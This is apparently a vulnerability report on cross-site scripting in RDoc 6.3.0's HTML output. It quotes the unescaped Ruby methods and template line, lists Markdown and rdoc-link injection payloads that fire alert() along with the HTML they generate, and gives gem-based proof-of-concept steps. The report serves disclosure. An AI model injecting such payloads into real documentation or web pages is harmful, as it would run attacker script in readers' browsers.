XSS in HTML generated by RDoc

XSS is possible in some places because escaping is not enough in the html generation part of RDoc. ### RDoc::Markup::ToHtml#gen_url https://github.com/ruby/rdoc/blob/v6.3.0/lib/rdoc/markup/to_html.rb#L330 ```ruby def gen_url url, text scheme, url, id = parse_url url if %w[http https link].include?(scheme) and url =~ /\.(gif|png|jpg|jpeg|bmp)$/ then "<img src=\"#{url}\" />" else if scheme != 'link' and /\.(?:rb|rdoc|md)\z/i =~ url url = url.sub(%r%\A([./]*)(.*)\z%) { "#$1#{$2.tr('.', '_')}.html" } end text = text.sub %r%^#{scheme}:/*%i, '' text = text.sub %r%^[*\^](\d+)$%, '\1' link = "<a#{id} href=\"#{url}\">#{text}</a>" link = "<sup>#{link}</sup>" if /"foot/ =~ id link end end ``` ```md [<script>alert`link text`</script>](a) [click](blocked:alert`javascript_scheme`) [onmouseover](http://"/onmouseover="alert`on_mouse_link`") [link_image](http://"onerror="alert`link_image`".png) ``` HTML containing the following XSS will be generated. ```html <p><a href="a"><script>alert`link text`</script></a></p> <p><a href="blocked:alert`javascript_scheme`">click</a></p> <p><a href="http://"/onmouseover="alert`on_mouse_link`"">onmouseover</a></p> <p><img src="http://"onerror="alert`link_image`".png" /></p> ``` ### RDoc::Markup::ToHtml#handle_RDOCLINK https://github.com/ruby/rdoc/blob/v6.3.0/lib/rdoc/markup/to_html.rb#L97 ```ruby def handle_RDOCLINK url # :nodoc: case url when /^rdoc-ref:/ $' when /^rdoc-label:/ text = $' text = case text when /\Alabel-/ then $' when /\Afootmark-/ then $' when /\Afoottext-/ then $' else text end gen_url url, text when /^rdoc-image:/ "<img src=\"#{$'}\">" else url =~ /\Ardoc-[a-z]+:/ $' end end ``` ```markdown rdoc-image:"><script>alert(`rdoc-image`)</script>" rdoc-label::path::"><script>alert(`rdoc-label_id`)</script>" rdoc-label::"><script>alert(`rdoc-label_path`)</script>" rdoc-ref:"><script>alert(`rdoc-ref`)</script>" rdoc-xxx:"><script>alert(`rdoc-xxx`)</script>" ```` ```html <p><img src=""><script>alert(`rdoc-image`)</script>“”></p> <p><a id="path::"><script>alert(`rdoc-label_id`)</script>“” href=“#”>:path::“><script>alert(`rdoc-label_id`)</script>”</a></p> <p><a id=""><script>alert(`rdoc-label_path`)</script>“” href=“#”>:“><script>alert(`rdoc-label_path`)</script>”</a></p> <p>“><script>alert(`rdoc-ref`)</script>”</p> <p>“><script>alert(`rdoc-xxx`)</script>”</p> ``` ### RDoc::Markup::ToHtmlSnippet#gen_url https://github.com/ruby/rdoc/blob/v6.3.0/lib/rdoc/markup/to_html_snippet.rb#L168 ```ruby def gen_url url, text if url =~ /^rdoc-label:([^:]*)(?::(.*))?/ then type = "link" elsif url =~ /([A-Za-z]+):(.*)/ then type = $1 else type = "http" end if (type == "http" or type == "https" or type == "link") and url =~ /\.(gif|png|jpg|jpeg|bmp)$/ then '' else text.sub(%r%^#{type}:/*%, '') end end ``` ```markdown [<img/src="."/onerror=alert("search")>](a) ``` XSS tag is embedded in `js/search_index.js`. ```js ["search","","target/search_md.html","","<p><img/src=\".\"/onerror=alert(\"search\")>\n"] ```` ### Rubygems RDoc home https://github.com/ruby/rdoc/blob/v6.3.0/lib/rdoc/generator/template/darkfish/index.rhtml#L20 ```html <p>This is the API documentation for <%= @title %>. ``` XSS is possible because `@title` is not escaped in the template used when RDoc is run by rubygems. --- ### PoC ``` $ gem -v 3.2.17 $ rdoc -v 6.3.1 ``` Build the gem using the attached `xss.md` and `rdoc_xss.gemspec` files. ``` $ gem build rdoc_xss.gemspec $ gem install rdoc_title_xss-0.0.1.gem $ gem sever ``` Confirm multiple xss by opening the http://0.0.0.0:8808/doc_root/rdoc_title_xss-0.0.1/ screen in browser. {F1291736} ## Impact XSS may be included if there is a function that generates html with RDoc for a file passed from the external. One of the XSS attack methods was previously reported to gitlab. ( https://hackerone.com/reports/200693 ) ( Probably sanitized by [html-pipeline](https://github.com/gjtorikian/html-pipeline).)